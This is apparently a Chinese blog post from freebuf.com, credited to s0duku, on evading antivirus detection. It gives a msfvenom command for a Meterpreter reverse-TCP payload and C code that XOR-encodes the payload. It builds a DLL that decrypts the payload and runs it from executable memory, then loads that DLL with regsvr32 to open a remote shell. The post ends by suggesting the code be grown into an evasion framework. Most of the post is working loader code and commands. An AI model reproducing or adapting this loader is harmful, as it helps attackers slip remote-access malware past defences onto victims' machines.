免杀简单实践
实验各种渗透框架的后门,结果很多文件放到硬盘上就开始报毒,这样的话根本
很难实际使用,网上搜索各种免杀工具,据发布有些时间的似乎也都不行,自己
稍微熟悉点的可能是dll这一块,看到有通过加密payload然后再打包成dll,最后
用regsvr32 加载执行的思路,感觉可以是实践下,好歹这个可以自己写下程序。
选择payload
这里选择msf的经典payload:windows/meterpreter/reverse_tcp
//生成c形式的payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=7657 -f c
选择加密方式
这里选择比较简单的逐字符异或加密
//粘贴msf的payload
unsigned char buf[] = "
....
....
unsigned char KEY = '\x87';//随便选个字符
int main(){
unsigned int cnt = 1;
for(unsigned int index=0;index < sizeof(buf);index++){
buf[index] = buf[index]^KEY;
}
printf("\n\tunsigned char buf[]=\n");
for(unsigned int index=0;index < sizeof(buf);){
if(cnt==1){
printf("\"");
}else if(cnt>15){
cnt = 1;
printf("\"\n");
continue;
}
printf("\\x%x",buf[index]);
index++;
cnt++;
}
if(cnt != 1){
printf("\"");
}
printf(";\n");
}
编译执行获得加密结果
D:\dllmaster>gcc -m32 xorGenerator.c
D:\dllmaster>a.exe
编写解密模块
//config.h 配置模块,一些基本设置
#define XORBYPASSER '\x87'
#define DATAEXEC
#define NOWINDOW
//xorBypasser.h
void xorDecoder(unsigned char buf[],unsigned int size);
//xorBypasser.c
#include "config.h"
void xorDecoder(unsigned char buf[],unsigned int size){
for(unsigned int index=0;index<size;index++){
#ifdef XORBYPASSER
buf[index] = buf[index]^XORBYPASSER;
#endif
}
}
编写DLL
//DllMain.h
#include "config.h"
void __attribute__((constructor)) DllMain(void);
//把加密后的payload粘贴过来
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b\x52"
"\x0c\x8b\x52\x14\x89\xe5\x31\xff\x0f\xb7\x4a\x26\x8b\x72\x28"
....
....
//DllMain.c
#include "DllMain.h"
#include <stdio.h>
#include <windows.h>
typedef void (__stdcall *CODE) ();
void DllMain(){
unsigned int buf_size = sizeof(buf);
#ifdef XORBYPASSER
xorDecoder(buf,buf_size);\\解密payload
#endif
//这里采用申请内存空间的方式,把payload复制进去执行,也可以将data段设置可执行位直接跳转执行
PVOID p = NULL;
if ((p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
MessageBoxA(NULL, "error", "info", MB_OK);
if (!(memcpy(p, buf, sizeof(buf))))
MessageBoxA(NULL, "error", "info", MB_OK);
CODE code =(CODE)p;
code();
}
编译测试DLL
gcc -m32 -shared -o master.dll xorBypasser.c DllMain.c
在编写一个注册脚本 保存为test.bat
regsvr32 master.dll
远控端启动multi/handler监听会话
点击bat,成功上线
注释掉代码里的XORBYPASSER宏,把payload换回未加密的,生成一个dll来比较下
gcc -m32 -shared -o noob.dll xorBypasser.c DllMain.c
在线查毒检测
master.dll 加密后的payload
noob.dll 未加密的payload
基本还是有效果的
后记
这套代码,可以进一步扩展,最简单的可以设计一套bat脚本,利用编译器的预处理,自动化修改源码,然后生成dll
还可以进一步编写更复杂的加密模块,代码混淆,payload分段,设计成免杀框架
来源:freebuf.com 2021-02-22 14:07:19 by: s0duku
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册